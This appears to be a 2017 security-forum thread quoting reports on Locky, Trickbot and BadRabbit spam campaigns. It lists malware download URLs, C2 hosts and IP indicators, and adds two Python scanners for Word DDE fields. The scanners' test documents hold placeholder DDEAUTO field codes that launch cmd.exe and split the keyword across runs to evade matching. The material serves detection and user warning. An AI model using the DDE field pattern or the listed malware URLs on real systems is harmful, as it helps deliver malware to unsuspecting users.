Attachment: Invoice 009863361 10.18.2017.7z
Body content:
totally empty blank

1] https://www.bleepingcomputer.com/news/security/necurs-malware-will-now-take-a-screenshot-of-your-screen-report-runtime-errors/
Oct 17, 2017
> https://www.symantec.com/connect/blogs/necurs-attackers-now-want-see-your-desktop
17 Oct 2017 - "... Beware of strangers offering fake invoices..."

Invoice 009863361 10.18.2017.7z: Extracts to: Invoice 364776483 10.18.2017.vbs
Current Virus total detections 10/56[2]. Payload Security [3]| JoeSandbox[4].
Thanks to various Twitter contacts (my grateful thanks to them all for their hard work and expert knowledge) we have some downloads sites delivering Locky ransomware using USA IP numbers - VirusTotal 17/56[5]. Payload Security[6] from these locations:
dbatee .gr/niv785yg
goliathstoneindustries .com/niv785yg
3overpar .com/niv785yg
pciholog .ru/niv785yg
disfrance .net/p66/niv785yg
Joesandbox was given a different binary (sandbox pcap) that is a totally different size (VirusTotal 17/66[7]) (Payload Security[8]) it looks like the file must have been cut off during download. Using a different UK IP number, one researcher was given Trickbot banking trojan (VirusTotal 21/66[9]) (Payload Security[10]) from:
envi-herzog .de/iuty56g
pac-provider .com/iuty56g
pesonamas .co.id/iuty56g
disfrance .net/p66/iuty56g
... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
2] https://www.virustotal.com/en/file/d7767dfdbc9a2b607b8ae485e039d9fc910a39a80b0efe696f53a5f69d69914f/analysis/1508316046/
Invoice 364776483 10.18.2017.vbs

3] https://www.hybrid-analysis.com/sample/d7767dfdbc9a2b607b8ae485e039d9fc910a39a80b0efe696f53a5f69d69914f?environmentId=100
DNS Requests
49.51.134.78
Contacted Hosts
49.51.134.78

4] https://jbxcloud.joesecurity.org/analysis/390019/1/html

5] https://www.virustotal.com/en/file/64aae4b954766b84f8f8fdac62f7b53dcaa61b07031321a027740a4f9f0fe484/analysis/

6] https://www.hybrid-analysis.com/sample/64aae4b954766b84f8f8fdac62f7b53dcaa61b07031321a027740a4f9f0fe484?environmentId=100

7] https://www.virustotal.com/en/file/64aae4b954766b84f8f8fdac62f7b53dcaa61b07031321a027740a4f9f0fe484/analysis/

8] https://www.hybrid-analysis.com/sample/d94d3de59b3c68e82a4741a53bfec507292244c181631fa5aac70c1479dbcac2?environmentId=100

9] https://www.virustotal.com/en/file/9f6cce5b4c800f6ee2713efb58c098b2520257cac831288f576a1a4c01c1564b/analysis/

10] https://www.hybrid-analysis.com/sample/9f6cce5b4c800f6ee2713efb58c098b2520257cac831288f576a1a4c01c1564b?environmentId=100

:fear::fear: :mad:

AplusWebMaster
2017-10-19, 14:07
FYI...

Fake 'Invoice' SPAM - delivers Locky and Trickbot
- https://myonlinesecurity.co.uk/malware-delivered-via-necurs-botnet-by-dde-feature-in-microsoft-word/
19 Oct 2017 - "Another change from the Necurs botnet delivering Locky and Trickbot again today with an email with the subject of 'Emailed Invoice – 459572' (random numbers) pretending to come from random names at your own email address or company domain...
They have changed to using word docs again but they are -not- using macros but using the DDE “exploit” or feature which -allows- linked files. These are very similar to embedded ole objects but instead of the object (normally a script file) being embedded in the word doc & you clicking it to allow it to run, these link to a remote website without you seeing the link. This link describes it in better detail:
> https://blog.barkly.com/microsoft-office-malware-attack-no-macros

One of the emails looks like:
From: Stacie Osborne <Stacie@ victim domain .tld>
Date: Thu 19/10/2017 11:15
Subject: Emailed Invoice – 459572
Attachment: I_459572.doc
Body content:
As requested
regards
Stacie Osborne ...

Screenshot of word doc:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/I_459572_doc.png

I_459572.doc - Current Virus total detections 9/60*. Payload Security**
The word doc uses this DDE “feature” to contact (in this example, there will be loads of others)
http ://alexandradickman .com/KJHDhbje71 where a base64 encoded file is opened and decoded.
This has 3 hardcoded URLs inside it (again there will be others in other examples)
“http ://shamanic-extracts .biz/eurgf837or”,
”http ://centralbaptistchurchnj .org/eurgf837or”,
”http ://conxibit .com/eurgf837or” which gives a txt file which is -renamed- to rekakva32.exe
(VirusTotal 6/65[3]) (Payload Security[4])... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/ea132c34ebbc591eda78531e2bfb9a4cb40e55a245191f54e82df25be9b58db2/analysis/1508408047/

** https://www.hybrid-analysis.com/sample/ea132c34ebbc591eda78531e2bfb9a4cb40e55a245191f54e82df25be9b58db2?environmentId=100
DNS Requests
98.124.251.65
83.242.103.81
98.124.251.65
Contacted Hosts
98.124.251.65
62.212.154.98
83.242.103.81

3] https://www.virustotal.com/en/file/d2cca5f6109ec060596d7ea29a13328bd0133ced126ab70974936521db64b4f4/analysis/1508408465/

4] https://www.hybrid-analysis.com/sample/d2cca5f6109ec060596d7ea29a13328bd0133ced126ab70974936521db64b4f4?environmentId=100
Contacted Hosts
188.190.71.132
___

Fake 'eFax' SPAM - delivers Trickbot
- https://myonlinesecurity.co.uk/more-fake-efax-messages-deliver-trickbot-banking-trojan/
19 Oct 2017 - "An email with the subject of 'eFax' pretending to come from eFax service but actually coming from a whole range of look-a-like domains with a malicious word doc attachment is today’s latest spoof of a well-known company, bank or public authority delivering Trickbot banking Trojan... the criminals sending these have registered various domains that look-like genuine Company, Bank, Government or message sending services...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/eFax-Trickbot-email-faxservicexx_ml.png

efax190238535-34522.doc - Current Virus total detections 4/59*. Payload Security**
This malware file downloads from
http ://acupuncturenorthwest .com/kas47.png which of course is -not- an image file but a renamed .exe file that gets renamed to Fcd-4.exe (VirusTotal 12/64[3]). An alternative download location is
http ://www.agcofruit .com/kas47.png
This email attachment contains a genuine word doc with a macro script that when run will infect you.
The word doc looks like:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/efax190238535-34522_doc.png
... DO NOT follow the advice they give to enable macros or enable editing to see the content... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/f89e1c298bd162716e62906e1dca9b1353d0162788f1db9ceb5daed8f3f9d30c/analysis/1508420918/

** https://www.hybrid-analysis.com/sample/f89e1c298bd162716e62906e1dca9b1353d0162788f1db9ceb5daed8f3f9d30c?environmentId=100
DNS Requests
74.50.21.13
64.182.208.184
Contacted Hosts
74.50.21.13
64.182.208.184
79.170.7.139
185.125.46.77

3] https://www.virustotal.com/en/file/ba39b1e9160333f0067862806c31cfd4f07bf9946e660a2c8f0dc045afcf884d/analysis/
Fcd-4.exe

acupuncturenorthwest .com: 74.50.21.13: https://www.virustotal.com/en/ip-address/74.50.21.13/information/
> https://www.virustotal.com/en/url/42d62a0f2fc6699369a028a20ef6bd12dc3cdc1141c23a2e6cff1a3357adfff7/analysis/

agcofruit .com: 192.185.118.67: https://www.virustotal.com/en/ip-address/192.185.118.67/information/
> https://www.virustotal.com/en/url/ade853286c9cf3cd5081bc8721c89244dbb130ee2458282e7286fa5819e70065/analysis/
___

Locky Ransomware’s Recent SPAM
- http://blog.trendmicro.com/trendlabs-security-intelligence/look-locky-ransomwares-recent-spam-activities/
Oct 19, 2017 - "... A closer look at Locky’s activities reveals a constant: the use of spam. While spam remains to be a major entry point for ransomware, others such as Cerber also employ vectors like exploit kits. Locky, however, appears to concentrate its distribution through large-scale spam campaigns regardless of the variants released by its operators/developers... We’ve also found how the scale and scope of Locky’s distribution are fueled by the Necurs botnet, a spam distribution infrastructure comprising zombified devices. It churns out a sizeable amount of spam emails carrying information stealers like Gameover ZeuS, ZBOT or Dridex, and other ransomware families such as CryptoLocker, CryptoWall, and Jaff. Necurs is Locky’s known and long-time partner in crime, and it’s no coincidence that the surge of Locky-bearing spam emails corresponds with the uptick in Necurs’ own activity. In fact, we saw that Necurs actively pushed Locky from August to October:
> https://blog.trendmicro.com/trendlabs-security-intelligence/files/2017/10/locky-spam-2.jpg
It’s also worth noting that Necurs also distributed Locky via URL-only spam emails — that is, the messages didn’t have -any- attachments, but rather -links- that divert users to -compromised- websites hosting the ransomware. The use of HTMLs embedded with -links- to the -compromised- site also started gaining traction this year... the continuous changes in Locky’s use of file attachments are its way of adjusting its tools to evade or bypass traditional security. But despite the seeming variety, there are common denominators in Locky’s social engineering, particularly in the email subjects and content. They appear to have the same old flavors, but with relatively different twists. Some of the recent lures we saw were:
- Fake voice message notifications (vishing, or the use of voice-related systems in phishing attacks)
- HTML attachments posing as invoices
- Archive files masquerading as business missives from multinationals, e.g., audit and budget reports
- Fraudulent emails that involve monetary transactions such as bills, parcel/delivery confirmations, and payment receipts..."
(More detail at the trendmicro URL above.)

:fear::fear: :mad:
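The DDE technique described in the first post above works without macros: the Word document carries a field whose instruction starts with DDE or DDEAUTO, and Word asks to "update links" and launches whatever the field names. The field instruction lives in plain XML inside a .docx (word/document.xml and any header, footer or footnote part) and as text inside a legacy binary .doc, so it can be found without opening the file in Word. The following is an added example, not code from myonlinesecurity.co.uk, Barkly or this forum, that reassembles field codes from a .docx and greps a binary .doc for the same keyword. It reassembles a field even when the instruction is split across many small instrText runs, which is a common evasion against naive string matching. The test document is constructed in memory by the script itself (a harmless field that names cmd.exe and calc.exe as a placeholder), not a real sample from the campaign.

```python
"""Find DDE/DDEAUTO field codes in Word files (the macro-less technique above).

Added example, not from the quoted posts. Assumes only the standard library.
"""
from __future__ import annotations

import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
W = "{" + W_NS + "}"

# A field code that hands control to a DDE server. Not anchored, because the
# DDE field may be nested inside another field (e.g. QUOTE) or wrapped in quotes.
DDE_RE = re.compile(r'(?<![A-Za-z0-9])DDE(AUTO)?\b', re.IGNORECASE)
# The same keyword inside a legacy binary .doc, whose text may be 8-bit or UTF-16LE.
DDE_8BIT = re.compile(rb"DDE(AUTO)?[ \t]", re.IGNORECASE)
DDE_UTF16 = re.compile(rb"D\x00D\x00E\x00(A\x00U\x00T\x00O\x00)?\x20\x00", re.IGNORECASE)


def field_codes(xml_bytes: bytes) -> list:
    """Reassemble every field code in a WordprocessingML part, in document order.

    A complex field is fldChar(begin) ... instrText runs ... fldChar(separate)
    ... result text ... fldChar(end). Malicious documents split the instruction
    across many small instrText runs, so fragments are joined per field; nested
    fields are tracked with a depth counter and reported as one joined code.
    """
    root = ET.fromstring(xml_bytes)
    codes, current, depth = [], [], 0
    for el in root.iter():                       # preorder == document order
        if el.tag == W + "fldSimple":            # simple field: whole code in an attribute
            codes.append(el.get(W + "instr", ""))
        elif el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                depth += 1
            elif kind == "end" and depth > 0:
                depth -= 1
                if depth == 0:
                    codes.append("".join(current))
                    current = []
        elif el.tag == W + "instrText" and depth > 0:
            current.append(el.text or "")
    if depth > 0:                                # unterminated field: still report it
        codes.append("".join(current))
    return codes


def find_dde_fields(docx_bytes: bytes) -> list:
    """Return the field codes from every XML part of a .docx that reference DDE."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as zf:
        # Fields can also hide in headers, footers, footnotes and comments.
        for name in zf.namelist():
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            try:
                codes = field_codes(zf.read(name))
            except ET.ParseError:
                continue
            hits.extend(c for c in codes if DDE_RE.search(c))
    return hits


def find_dde_in_legacy_doc(doc_bytes: bytes) -> list:
    """Crude check for the binary .doc format: grep both text encodings."""
    found = [m.group(0).decode("latin-1") for m in DDE_8BIT.finditer(doc_bytes)]
    found += [m.group(0).decode("utf-16-le") for m in DDE_UTF16.finditer(doc_bytes)]
    return found


def build_sample_docx(instr_runs: list) -> bytes:
    """Constructed test input (not a real sample): a minimal .docx whose body
    holds one complex field with its instruction split across instr_runs."""
    runs = "".join(
        f'<w:r><w:instrText xml:space="preserve">{escape(r)}</w:instrText></w:r>'
        for r in instr_runs)
    document = (
        '<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
        f'<w:document xmlns:w="{W_NS}"><w:body><w:p>'
        '<w:r><w:fldChar w:fldCharType="begin"/></w:r>' + runs +
        '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
        '<w:r><w:t>Please wait while the document loads.</w:t></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        '</w:p></w:body></w:document>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")   # placeholder; enough for this scanner
        zf.writestr("word/document.xml", document)
    return buf.getvalue()


if __name__ == "__main__":
    # Placeholder command line, split across runs the way evasive samples do it.
    split = build_sample_docx([" DDEAU", "TO c:\\windows\\system32\\cmd.exe ", '"/c calc.exe" '])
    print(find_dde_fields(split))                          # one reassembled DDEAUTO field
    print(find_dde_fields(build_sample_docx([" PAGE "])))  # []
```

Treat a hit as "open in a sandbox, never on a workstation": the instruction text after DDEAUTO is exactly what Word will pass to the named program. The .doc check is only a keyword grep and will also fire on ordinary prose that contains "DDE " followed by a space; for the binary format a proper OLE/Word parser is the real tool, this just shows that the keyword is visible without Word.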

AplusWebMaster
2017-10-20, 15:09
FYI...

Today's crop of cyber criminal attempts to INFECT systems and PCs through E-mail gets WORSE. Best bet is to read these posts by "good-guy" analysts and get what you can from their research, however convoluted the criminals' means have evolved, and remember the standard warnings for ALL E-mail that hits your Inbox:

"DO NOT follow the advice they give to enable macros or enable editing to see the content.

The basic rule is NEVER open any attachment -or- link in an email, unless you are expecting it."

Scanned image from MX-2600N malspam pretending to come from your own company delivers Locky ransomware using Word DDE exploit
- https://myonlinesecurity.co.uk/scanned-image-from-mx-2600n-malspam-pretending-to-come-from-your-own-company-delivers-locky-ransomware-using-word-dde-exploit/
20 Oct 2017

Fake Swift Copy message delivers fareit trojan
- https://myonlinesecurity.co.uk/fake-swift-copy-message-delivers-fareit-trojan/
20 Oct 2017

More Locky ransomware delivered via DDE exploit pretending to come from your own company or email address
- https://myonlinesecurity.co.uk/more-locky-ransomware-delivered-via-dde-exploit-pretending-to-come-from-your-own-company-or-email-address/
20 Oct 2017

Necurs Botnet malspam pushes Locky using DDE attack
- https://isc.sans.edu/forums/diary/Necurs+Botnet+malspam+pushes+Locky+using+DDE+attack/22946/
2017-10-19 - "... the DDE attack* technique has spread to large-scale distribution campaigns..."
* https://www.bleepingcomputer.com/news/security/microsoft-office-attack-runs-malware-without-needing-macros/
___

Alert (TA17-293A)
Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors
- https://www.us-cert.gov/ncas/alerts/TA17-293A
Oct 20, 2017 - "Systems Affected:
Domain Controllers
File Servers
Email Servers
Overview: This joint Technical Alert (TA) is the result of analytic efforts between the Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI). This alert provides information on advanced persistent threat (APT) actions targeting government entities and organizations in the energy, nuclear, water, aviation, and critical manufacturing sectors. Working with U.S. and international partners, DHS and FBI identified victims in these sectors. This report contains indicators of compromise (IOCs) and technical details on the tactics, techniques, and procedures (TTPs) used by APT actors on compromised victims’ networks...
DHS assesses this activity as a multi-stage intrusion campaign by threat actors targeting low security and small networks to gain access and move laterally to networks of major, high value asset owners within the energy sector. Based on malware analysis and observed IOCs, DHS has confidence that this campaign is still ongoing, and threat actors are actively pursuing their ultimate objectives over a long-term campaign. The intent of this product is to educate network defenders and enable them to identify and reduce exposure to malicious activity..."
(More detail at the us-cert URL above.)

:fear::fear: :mad:

AplusWebMaster
2017-10-23, 12:30
FYI...

Fake 'Office 365 update' SPAM - delivers Trojan
- https://myonlinesecurity.co.uk/fake-office-365-update-malspam-delivers-cthonic-banking-trojan/
23 Oct 2017 - "... an email with the subject of 'Office 365' pretending to come from Microsoft Security Team but actually coming via what looks like a compromised email account...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/Office_365_cthonic.png

office_security_update.zip: Extracts to: ms_office_update.exe - Current Virus total detections 13/67*.
Payload Security**...
Update: after digging around the mail server quarantine, I have found several of these, coming via numerous different -compromised- email accounts. All of them have the same malformed content with no accessible attachment... The basic rule is NEVER open any attachment or link in an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/7be8966df205b91f95f3c56ef972be0264b35c865450fb69b9861fd82748e69b/analysis/1508670171/
ms_office_update.exe

** https://www.hybrid-analysis.com/sample/7be8966df205b91f95f3c56ef972be0264b35c865450fb69b9861fd82748e69b?environmentId=100
DNS Requests
35.189.99.49
Contacted Hosts
45.63.25.55
5.9.49.12
87.98.175.85
141.138.157.53
45.63.99.180
45.32.28.232
108.61.164.218
45.56.117.118
23.94.5.133
51.255.48.78
35.189.99.49
144.76.133.38

:fear::fear: :mad:

AplusWebMaster
2017-10-24, 15:38
FYI...

'BadRabbit' ransomware attacks...
> https://www.bleepingcomputer.com/news/security/bad-rabbit-ransomware-outbreak-hits-eastern-europe/
Oct 24, 2017 - "A new ransomware strain named 'Bad Rabbit' is wreaking havoc in many Eastern European countries, affecting both government agencies and private businesses alike. At the time of writing, the ransomware has hit countries such as Russia, Ukraine, Bulgaria, and Turkey. The speed with which Bad Rabbit spread is similar to the WannaCry and NotPetya outbreaks... ESET and Proofpoint researchers say Bad Rabbit has initially spread via -fake- Flash update packages, but the ransomware also appears to come with tools that help it move laterally inside a network, which may explain why it spread so quickly across several organizations in such a small time..."

> https://twitter.com/hashtag/BadRabbit?src=hash

> https://www.csoonline.com/article/3234691/security/badrabbit-ransomware-attacks-multiple-media-outlets.html
Oct 24, 2017

> https://www.welivesecurity.com/2017/10/24/kiev-metro-hit-new-variant-infamous-diskcoder-ransomware/
24 Oct 2017

> https://askwoody.com/tag/badrabbit/
Oct 24, 2017

> https://www.virustotal.com/en/file/630325cac09ac3fab908f903e3b00d0dadd5fdaa0875ed8496fcbb97a558d0da/analysis/
BadRabbit.exe.virus / Uninstaller 27.0
49/66
File detail: FlashUtil.exe
Additional info:
install_flash_player.exe
___

Fake 'Invoice' SPAM - using 'DDE exploit'
- https://myonlinesecurity.co.uk/another-locky-ransomware-fake-invoice-malspam-campaign-using-dde-exploit/
24 Oct 2017 - "Another Locky ransomware campaign using the DDE exploit[1]...
1] https://www.bleepingcomputer.com/news/security/microsoft-office-attack-runs-malware-without-needing-macros/
... the word doc contains embedded -links- that use the DDE exploit to contact a remote server & get a base64 encoded string which decodes to a set of instructions to contact a list-of-urls in turn, until one responds...
Asking somebody to 'update links' seems innocent enough and many recipients will click 'yes':
Update fields warning message from DDE exploit word doc:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/update-fields.png
... many of the intermediate stages and files never get stored or kept on the victim’s computer, in fact the final Locky binary is deleted as soon as it has been run, so there are few forensic artefacts for investigation. Brad Duncan has done a Blog post at ISC explaining all this in detail[2] with examples from the earlier run.
2] https://isc.sans.edu/forums/diary/Necurs+Botnet+malspam+pushes+Locky+using+DDE+attack/22946/

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/Your-Invoice-19499-Locky-ransomware-DDE-email.png

Invoice_file_921629.doc - Current Virus total detections 10/61*. Payload Security** | contacts
'http ://transmercasa .com/JHGGsdsw6'
where it downloads to memory the base64 encoded string which decodes to give these 3 urls
http ://tatianadecastelbajac .fr/kjhgFG
http ://video.rb-webdev .de/kjhgFG
http ://themclarenfamily .com/kjhgFG

This delivers heropad64.exe (VirusTotal 51/67[3]) (Payload Security[4]) which in turn sends a post request with system fingerprints to
http ://webhotell .enivest.no/cuYT39.enc
where if the response is acceptable it then downloads the Locky ransomware file from that site in an encrypted text format and converts it to a working .exe. 6213Lq3p.exe (VirusTotal 8/67[5]).
It then autoruns it & deletes both the encrypted txt and the binary. It further contacts what looks like a C2 at
http ://gdiscoun .org ...
... easy to protect against by changing 1 simple setting in Microsoft Word (provided your company does -not- use the DDE feature to dynamically update word files with content from Excel spreadsheets etc). See HERE for details:
- https://myonlinesecurity.co.uk/malformed-infected-word-docs-embedded-macro-viruses/#dde

... The Word doc has changed slightly since last week with a couple of blue star like images instead of just a few Russian characters or words:
> https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/Invoice_file_921629_doc.png

... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/46bb448bd849212c1df99cae15984b669dc19cf16fb6ccb28b211a3d21b50f1d/analysis/1508840890/

** https://www.hybrid-analysis.com/sample/46bb448bd849212c1df99cae15984b669dc19cf16fb6ccb28b211a3d21b50f1d?environmentId=100
DNS Requests
75.98.175.70
178.216.98.139
151.236.60.40
62.50.190.101
Contacted Hosts
75.98.175.70
151.236.60.40
178.216.98.139
62.50.190.101

3] https://www.virustotal.com/en/file/3d750de58563f860cd8f8674ce08e96b1f4e3ae3564c10efe61c50738056b0f2/analysis/

4] https://www.hybrid-analysis.com/sample/3d750de58563f860cd8f8674ce08e96b1f4e3ae3564c10efe61c50738056b0f2?environmentId=100
DNS Requests
217.175.4.4
Contacted Hosts
217.175.4.4

5] https://www.virustotal.com/en/file/0f5be64bc9be27c4a9cab972f5a5879337cb8cfd155a84e62399ed34e8d5a1dc/analysis/1508841472/
6213Lq3p.exe
___

Fake 'Scan Data' SPAM - delivers Locky via 'DDE exploit'
- https://myonlinesecurity.co.uk/locky-ransomware-delivered-via-dde-exploit-scan-data-malspam-no-replyvictim-domain/
24 Oct 2017 - "... Once again the word doc contains embedded links that use the 'DDE exploit' to contact a remote server & get a base64 encoded string which decodes to a set of instructions to contact a list of urls in turn, until one responds, to download a small file which in turn downloads the main Locky ransomware binary...

... easy to protect against by changing 1 simple setting in Microsoft Word (provided your company does not use the DDE 'feature' to dynamically update word files with content from Excel spreadsheets etc) See HERE for details:
> https://myonlinesecurity.co.uk/malformed-infected-word-docs-embedded-macro-viruses/#dde ..."
___

Fake 'Order acknowledgement' SPAM - malicious attachment
- http://blog.dynamoo.com/2017/10/malware-spam-order-acknowledgement-for.html
24 Oct 2017 - "A change to the usual -Necurs- rubbish, this -fake- order has a malformed .z archive file which contains a malicious executable with an icon to make it look-like an Office document:
Reply-To: purchase@ animalagriculture .org
To: Recipients [DY]
Date: 24 October 2017 at 06:48
Subject: FW: Order acknowledgement for BEPO/N1/380006006(2)
Dear All,
Kindly find the attached Purchase order# IT/IMP06/06-17 and arrange to send us the order acknowledgement by return mail.
Note: Please expedite
the delivery as this item is very urgently required.
Regards, Raj Kiran
(SUDARSHAN SS) NAVAL SYSTEMS (S&CS) ...

Attached is a file -Purchase order comfirmation.doc.z- which contains a malicious executable 'Purchase order comfirmation.exe' which currently has a detection rate of 12/66*. It looks like the archive type does -not- actually match the extension:
> https://3.bp.blogspot.com/-fAXTqMJsHws/We700jQsXuI/AAAAAAAAMcA/ibMuiLgbcvoK_TUPgf8Nvtazi3E4pUtKACLcBGAs/s1600/7zip-error.png
If the intended target -hides- file extensions then it is easy to see how they could be fooled:
> https://2.bp.blogspot.com/-rrnVYS9MZLA/We71BknldmI/AAAAAAAAMcE/9CbPWH_wB0YbgukhZZMBnnPERq7DqLQLQCLcBGAs/s1600/po.png
... VirusTotal shows this information about the file**...
The Hybrid Analysis*** for is a little interesting (seemingly identifying it as Loki Bot), showing the malware phoning home to:
jerry.eft-dongle .ir/njet/five/fre.php (188.165.162.201 / Mizban Web Paytakht Co. Ltd., Iran)
> https://www.virustotal.com/en/ip-address/188.165.162.201/information/
... RIPE show them as being in Tehran:
> https://www.ripe.net/membership/indices/data/ir.mwp.html
... if you are -not- interested in sending traffic to Iran, Mizban Web Paytakht own AS64428 which comprises 185.165.40.0/22 as well. I'll make a guess that the 188.165.162.200/29 range may be -insecure- and could be worth blocking... You probably -don't- need to accept .z attachments at your mail perimeter, and any decent anti-spam tool should be able to look inside archives to determine what is in there."
* https://www.virustotal.com/en/file/87fd3dae059be4f0cc2035e392436fd778606c53388848c98d81b050433e010f/analysis/
Purchase order comfirmation.exe

** File detail: SysInv2.exe

*** https://www.hybrid-analysis.com/sample/87fd3dae059be4f0cc2035e392436fd778606c53388848c98d81b050433e010f?environmentId=100
DNS Requests
188.165.162.201
Contacted Hosts
188.165.162.201

:fear::fear: :mad:
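
The 'update links' prompt in the two Locky posts above comes from a DDE / DDEAUTO field inside the Word document. The following is an added example, not code from myonlinesecurity.co.uk or the ISC diary: a stdlib-only Python scanner that unpacks a .docx, reconstructs every field code (simple fields and complex fields whose code is split across several w:instrText runs, which is how these lures hide the keyword) and flags any that contain DDE or DDEAUTO, including the variant that spells the keyword from character codes with a QUOTE field. It only handles OOXML (.docx); the legacy binary .doc attachments named in the posts would need an OLE parser. The two documents built at the bottom are constructed test inputs, not the real samples.

```python
"""Added example (not from the quoted posts): scan a .docx for DDE / DDEAUTO
field codes, the "update links" lure described above.  Stdlib only."""
import io
import re
import sys
import xml.etree.ElementTree as ET
import zipfile

W = "{http://schemas.openxmlformats.org/wordprocessingml/2006/main}"

# DDE or DDEAUTO anywhere in a (normalised) field code.  Not anchored to the
# start of the code, so wrapping the keyword in a QUOTE field does not hide it.
DDE_RE = re.compile(r"\bDDE(?:AUTO)?\b", re.IGNORECASE)
# { QUOTE 68 68 69 65 85 84 79 } spells "DDEAUTO" from character codes.
QUOTE_NUM_RE = re.compile(r"QUOTE((?:\s+\d{2,3})+)", re.IGNORECASE)


def field_codes(xml_bytes):
    """Yield every field code in one WordprocessingML part.

    Covers <w:fldSimple w:instr="..."/> and complex fields, whose code is split
    over several <w:instrText> runs between fldChar begin ... end (nested
    fields are flattened into the outermost one)."""
    root = ET.fromstring(xml_bytes)
    for fs in root.iter(W + "fldSimple"):
        yield fs.get(W + "instr", "")
    depth, buf = 0, []
    for el in root.iter():
        if el.tag == W + "fldChar":
            kind = el.get(W + "fldCharType")
            if kind == "begin":
                depth += 1
            elif kind == "end" and depth:
                depth -= 1
                if depth == 0:
                    yield "".join(buf)
                    buf = []
        elif depth and el.tag == W + "instrText" and el.text:
            buf.append(el.text)


def normalise(code):
    """Collapse whitespace and decode QUOTE-by-character-code obfuscation."""
    code = " ".join(code.split())
    return QUOTE_NUM_RE.sub(
        lambda m: "".join(chr(int(n)) for n in m.group(1).split()), code)


def scan_docx(docx):
    """Return [(part name, normalised field code)] for every DDE field found.

    `docx` is a path or a file-like object; every XML part under word/ is
    checked so fields hidden in headers, footers or footnotes are seen too."""
    hits = []
    with zipfile.ZipFile(docx) as z:
        for name in z.namelist():
            if not (name.startswith("word/") and name.endswith(".xml")):
                continue
            try:
                codes = list(field_codes(z.read(name)))
            except ET.ParseError:
                continue
            for code in codes:
                norm = normalise(code)
                if DDE_RE.search(norm):
                    hits.append((name, norm))
    return hits


# --- constructed test documents (not real samples) ---------------------------
_NS = 'xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main"'
BENIGN_XML = (f'<w:document {_NS}><w:body><w:p>'
              '<w:fldSimple w:instr=" PAGE "/></w:p></w:body></w:document>')
# Keyword split across two runs, as the malicious generators do; the command
# is a harmless placeholder, not the payload from the real documents.
LURE_XML = (f'<w:document {_NS}><w:body><w:p>'
            '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
            '<w:r><w:instrText xml:space="preserve"> DDEAU</w:instrText></w:r>'
            '<w:r><w:instrText xml:space="preserve">TO c:\\\\Windows\\\\System32\\\\cmd.exe "/k echo hi"</w:instrText></w:r>'
            '<w:r><w:fldChar w:fldCharType="separate"/></w:r>'
            '<w:r><w:t>Error! Unable to update links.</w:t></w:r>'
            '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
            '</w:p></w:body></w:document>')


def build_docx(document_xml):
    """Minimal in-memory .docx wrapper around one document.xml (test input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", document_xml)
    buf.seek(0)
    return buf


if __name__ == "__main__":
    for path in sys.argv[1:]:
        for part, code in scan_docx(path):
            print(f"{path}: DDE field in {part}: {code}")
    if not sys.argv[1:]:
        print(scan_docx(build_docx(LURE_XML)))    # constructed lure
        print(scan_docx(build_docx(BENIGN_XML)))  # constructed benign doc
```

Run it as `python dde_scan.py suspect.docx`; with no arguments it scans the two constructed documents. The "1 simple setting" the post points to is the Word option that stops links being updated when a file opens; Microsoft later documented the same control as the DontUpdateLinks DWORD under HKCU\Software\Microsoft\Office\<version>\Word\Options (Security Advisory 4053440), which is worth pushing by policy wherever DDE links are not actually used.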

AplusWebMaster
2017-10-25, 14:24
FYI...

Fake 'Quotation' SPAM - delivers malware
- https://myonlinesecurity.co.uk/fake-quotation-update-request-delivers-malware/
25 Oct 2017 - "... an email with the subject of 'Re: Quotation' pretending to come from SNG Equipment <sales@ sngequipment .com> (in previous similar emails, the sender & companies mentioned in the email body were fairly random). I am not entirely sure what malware this is. Indications are it could be Lokibot... This file has an icon that makes it look like it is an Excel spreadsheet. Unless you have "show known file extensions" enabled, it can easily be mistaken for a genuine XLS spreadsheet instead of the .EXE file it really is, so making it much more likely for you to accidentally open it and be infected...

Screenshot: https://myonlinesecurity.co.uk/wp-content/uploads/2017/10/re-Quotation-email.png

Quotation.zip: Extracts to: Quotation.exe - Current Virus total detections 12/65*. Payload Security** ...
The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/2a1b3cf8d8b4c72d85e14a8673588a1e76b0407ad8375bcb9c02f612c0090076/analysis/1508905407/
Quotation.exe

** https://www.hybrid-analysis.com/sample/2a1b3cf8d8b4c72d85e14a8673588a1e76b0407ad8375bcb9c02f612c0090076?environmentId=100
___

Fake 'Payment slip' SPAM - delivers Java Trojan
- https://myonlinesecurity.co.uk/fake-payment-slip-copy-malspam-delivers-java-trojan/
25 Oct 2017 - "... emails containing java Adwind, Java Jacksbot or other Java backdoor or Remote Access Trojans. We see these sort of emails frequently. Today’s has a slightly different subject and email content to many of the previous ones. This has a link-to-download-the-java-file rather than an attachment containing the malware...

